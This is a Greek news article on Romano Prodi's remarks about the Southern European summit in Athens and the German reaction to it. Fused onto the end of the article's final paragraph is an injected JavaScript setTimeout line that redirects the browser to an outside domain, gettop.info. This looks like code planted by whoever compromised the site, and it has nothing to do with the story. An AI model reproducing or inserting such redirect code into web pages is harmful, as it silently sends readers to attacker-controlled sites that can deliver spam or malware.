Πρόντι: Οι γερμανικές εκφράζεις για τη Σύνοδο του Νότου άγγιζαν την απειλή

0
9

 

Σε σχόλιό του στην εφημερίδα Il Mesaggero για τη Σύνοδο των χωρών του Νότου, ο πρώην πρόεδρος της Ευρωπαϊκής Επιτροπής, Ρομάνο Πρόντι γράφει πως αυτή έπρεπε να είχε οργανωθεί πριν από χρόνια.

«Την Παρασκευή, οι επικεφαλής των χωρών της Νότιας Ευρώπης συναντήθηκαν στην Αθήνα για να ζητήσουν περισσότερη ευελιξία και, κατά συνέπεια, μεγαλύτερη δυνατότητα ανάπτυξης. Μια συνάντηση η οποία θα έπρεπε να έχει οργανωθεί ήδη πριν από χρόνια, αλλά που δεν είχε γίνει ποτέ», σημειώνει ο Πρόντι.

«Το σημαντικότερο γεγονός είναι ότι την Παρασκευή στην Αθήνα, μαζί με τους «φτωχούς» του Νότου, ήταν παρόντες και οι Γάλλοι. Ίσως για τον λόγο αυτό, η γερμανική αντίδραση χαρακτηρίσθηκε από μια ασυνήθιστη βία, με εκφράσεις που άγγιζαν σχεδόν την απειλή, από μέρους του Μάνφρεντ Βέμπερ και του Γερμανού υπουργού Οικονομικών Σόιμπλε», προσθέτει ο Ιταλός πρώην πρωθυπουργός.

Σύμφωνα με τον Πρόντι «οι δυο αυτοί πολιτικοί επανέλαβαν, αμέσως, ότι παραχώρησαν ήδη αρκετή ευελιξία και ότι οι κανόνες πρέπει να τυχαίνουν σεβασμού. Ξεχνώντας τη ζημία, του τερατώδους εμπορικού πλεονάσματος της Γερμανίας, το οποίο, εδώ και χρόνια υπερβαίνει κάθε κοινοτικό κανόνα και δυσκολεύει σημαντικά την ικανότητα οικονομικής ανάκαμψης των άλλων χωρών». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here